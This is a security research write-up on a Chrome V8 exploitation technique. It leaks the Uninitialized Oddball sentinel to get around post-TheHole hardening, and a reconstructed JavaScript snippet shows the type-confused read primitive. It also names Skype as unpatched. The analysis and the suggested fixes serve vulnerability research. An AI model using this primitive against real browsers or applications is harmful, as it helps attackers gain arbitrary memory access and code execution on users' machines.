New Method for Exploiting Chrome v8 Vulnerabilities: Leaking Uninitialized Oddball Implementation for Sandbox Escape
Bypassing Chrome v8 HardenProtect by leaking Sentinel Value
Introduction
A sentinel value is a special value used in algorithms, typically as the termination condition of a loop or a recursion. The Chrome source code contains many such values. Previous research showed how leaking the TheHole object into JavaScript leads to arbitrary code execution inside the sandbox; Google landed a fix for that quickly.
TheHole is not the only native object in V8 that must never reach JavaScript. This article discusses the Uninitialized Oddball object, which, at the time of writing, still works for this purpose in the latest V8. The method has a degree of generality and has already appeared in several vulnerabilities.
Sentinel Value in V8
Most of V8's native objects are defined in v8/src/roots/roots.h and are laid out sequentially in memory as the roots table. Once a native object that must not be exposed leaks into JavaScript, arbitrary code execution inside the sandbox follows.
To verify the method, we can leak the Uninitialized Oddball into JavaScript by modifying one of V8's native runtime functions: change the root offset relative to the isolate that the %TheHole() runtime function loads, so that it returns the Uninitialized Oddball instead of TheHole. These %-prefixed runtime functions are only reachable from JavaScript when V8 (or d8) runs with --allow-natives-syntax.
Bypass HardenType
With the Uninitialized Oddball in hand, a relatively arbitrary read and write can be achieved. The key is that the optimized JavaScript read function only checks that obj has the expected prop attribute (that is, obj's map); it does not check the value actually stored in obj.prop. Instead it takes that value as the array and directly computes the element offset from it according to JavaScript semantics. When obj.prop holds the oddball rather than an array, this computation is a type confusion that yields an arbitrary (oddball-relative) read.
Because the Uninitialized Oddball sits earlier in the roots table and is more primitive in V8's memory layout than TheHole, it is easier to spoof than the TheHole object, which makes it the preferred way to bypass the hardening added after the TheHole mitigation.
The suggested fix is to add a map check on the array when the optimized function returns array elements, rather than computing the offset directly and returning whatever lies there.
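Putting the two steps above together (a patched %TheHole() that hands back the oddball, then an optimized read that trusts whatever is in obj.prop), the read primitive has the following shape. This is an added example reconstructed from the description on this page, not the original researchers' exploit code. It only does anything interesting on a V8 build with the %TheHole() modification described above; on an unmodified engine it runs safely and shows the warm-up, the call shape, and that the engine's own field-type tracking deoptimizes the read instead of confusing the types. The names makeVictim, read, warmUp, confuse and leakOddball are chosen here and are not from the page.

```javascript
'use strict';

// Victim object. After warm-up the optimizing compiler specializes read() on
// this shape: it records that field `prop` holds a JSArray whose backing store
// is a FixedDoubleArray.
function makeVictim() {
  return { prop: [1.1, 2.2, 3.3, 4.4] };
}

// The read function from the technique. In the optimized code the map of
// `obj` is checked (so `prop` exists at a fixed offset), but the value found
// in obj.prop is taken as the array and the element address is computed from
// it directly: elements_base(obj.prop) + idx * 8. If obj.prop holds an
// oddball instead of an array, the load becomes a read relative to the
// oddball's address, which is the confusion the page describes.
function read(obj, idx) {
  return obj.prop[idx];
}

// Warm-up: call read() with consistent types often enough for V8 to optimize
// it. Returns the accumulated sum so a caller can verify the loop ran.
function warmUp(victim, iterations) {
  let acc = 0;
  for (let i = 0; i < iterations; i++) {
    acc += read(victim, i & 3);
  }
  return acc;
}

// Confusion step. `leakOddball` stands in (assumption) for the patched native:
// on the modified V8 it would be
//   new Function('return %TheHole()')   // run with --allow-natives-syntax
// returning the Uninitialized oddball. It is passed in as a parameter so the
// step can be exercised anywhere. On an unmodified engine, storing a value of
// a different type into the tracked field invalidates the optimized code, the
// read deoptimizes, and a normal property lookup on the stored value happens.
function confuse(victim, leakOddball, idx) {
  victim.prop = leakOddball();   // store the leaked object into the typed field
  return read(victim, idx);      // optimized load computes the offset from it
}
```

Run it as-is with node to see the benign behaviour; the only change needed on the patched build is to supply the real `%TheHole()` wrapper as `leakOddball` and a large `idx`, at which point the returned doubles are the memory after the oddball rather than array elements.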
PatchGap Risk Reminder
Besides tracking historical vulnerabilities, one must also watch for vulnerabilities that vendors quietly fix in their underlying components. At the time of writing, Skype had not yet patched this vulnerability. Exploitation differs slightly between x86 and x64, but both achieve arbitrary read and write.
This PatchGap is not limited to Issue 1352549: the disclosure of the new method also substantially lowers the difficulty of exploiting similar vulnerabilities. An attacker can complete a full exploit of the previously leaked Uninitialized Oddball vulnerability with almost no further research.
Summary
V8 contains many other sentinel values that may have similar issues. This suggests a few points:
Can other Uninitialized Oddball leaks be turned into V8 RCE just as easily?
Whether such issues should officially count as security issues remains controversial.
During fuzzing, it may be worth adding the various sentinel values as variables in the generated test cases.
In any case, such issues greatly shorten the full exploitation cycle for attackers, and we should remain vigilant about them.